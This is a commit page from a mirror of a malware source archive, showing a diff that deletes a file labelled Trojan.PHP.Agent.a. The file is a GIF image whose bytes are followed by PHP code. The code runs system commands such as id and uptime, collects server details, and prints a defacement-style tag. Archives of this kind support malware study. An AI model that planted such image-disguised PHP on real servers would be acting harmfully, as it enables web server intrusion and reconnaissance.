mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Delete Trojan.PHP.Agent.a
This commit is contained in:
parent
2e53d3891f
commit
315e8bbb02
@ -1,58 +0,0 @@
|
||||
GIF89aY?
|
||||
|
||||
?÷?????EUR???EUR?EUREUR???EUREUR?EUR?EUREUREUREUREURÀÀÀ??????????????????????????????????????????????????????????????????????????????????????????????????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???3??3?33?f3??3?Ì3??33?33333f33?33Ì33?3f?3f33ff3f?3fÌ3f?3??3?33?f3??3?Ì3??3Ì?3Ì33Ìf3Ì?3ÌÌ3Ì?3??3?33?f3??3?Ì3??f??f?3f?ff??f?Ìf??f3?f33f3ff3?f3Ìf3?ff?ff3fffff?ffÌff?f??f?3f?ff??f?Ìf??fÌ?fÌ3fÌffÌ?fÌÌfÌ?f??f?3f?ff??f?Ìf???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???Ì??Ì?3Ì?fÌ??Ì?ÌÌ??Ì3?Ì33Ì3fÌ3?Ì3ÌÌ3?Ìf?Ìf3ÌffÌf?ÌfÌÌf?Ì??Ì?3Ì?fÌ??Ì?ÌÌ??ÌÌ?ÌÌ3ÌÌfÌÌ?ÌÌÌÌÌ?Ì??Ì?3Ì?fÌ??Ì?ÌÌ???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???,????Y?
|
||||
|
||||
????H° Á?*\È°¡C??J|q¢C?3N¬h'!Ç?;éQdI"Gj4H2cK?U®$Ør&È?,GÒÌ?0dL?>w$)t'Q¢?â?8TiÒ¥PyÕ)Ó&P--.?F?ørhV©NÃj...tkزW?¢¥?Ö)Ç?dÇÂ5ô¥O---5çF...qm?§gc¢E?²°áÃ?#?;
|
||||
<?php
|
||||
function ConvertBytes($number)
|
||||
{
|
||||
$len = strlen($number);
|
||||
if($len < 4)
|
||||
{
|
||||
return sprintf("%d b", $number);
|
||||
}
|
||||
if($len >= 4 && $len <=6)
|
||||
{
|
||||
return sprintf("%0.2f Kb", $number/1024);
|
||||
}
|
||||
if($len >= 7 && $len <=9)
|
||||
{
|
||||
return sprintf("%0.2f Mb", $number/1024/1024);
|
||||
}
|
||||
|
||||
return sprintf("%0.2f Gb", $number/1024/1024/1024);
|
||||
|
||||
}
|
||||
|
||||
echo "bsdcr3w<br>";
|
||||
$un = @php_uname();
|
||||
$up = system(uptime);
|
||||
$id1 = system(id);
|
||||
$pwd1 = @getcwd();
|
||||
$sof1 = getenv("SERVER_SOFTWARE");
|
||||
$php1 = phpversion();
|
||||
$name1 = $_SERVER['SERVER_NAME'];
|
||||
$ip1 = gethostbyname($SERVER_ADDR);
|
||||
$free1= diskfreespace($pwd1);
|
||||
$free = ConvertBytes(diskfreespace($pwd1));
|
||||
if (!$free) {$free = 0;}
|
||||
$all1= disk_total_space($pwd1);
|
||||
$all = ConvertBytes(disk_total_space($pwd1));
|
||||
if (!$all) {$all = 0;}
|
||||
$used = ConvertBytes($all1-$free1);
|
||||
$os = @PHP_OS;
|
||||
echo "We was here ... and u no !!!<br>";
|
||||
echo "uname -a: $un<br>";
|
||||
echo "os: $os<br>";
|
||||
echo "uptime: $up<br>";
|
||||
echo "id: $id1<br>";
|
||||
echo "pwd: $pwd1<br>";
|
||||
echo "php: $php1<br>";
|
||||
echo "software: $sof1<br>";
|
||||
echo "server-name: $name1<br>";
|
||||
echo "server-ip: $ip1<br>";
|
||||
echo "free: $free<br>";
|
||||
echo "used: $used<br>";
|
||||
echo "total: $all<br>";
|
||||
exit;
|
||||
|
Before Width: | Height: | Size: 3.0 KiB |
Loading…
Reference in New Issue
Block a user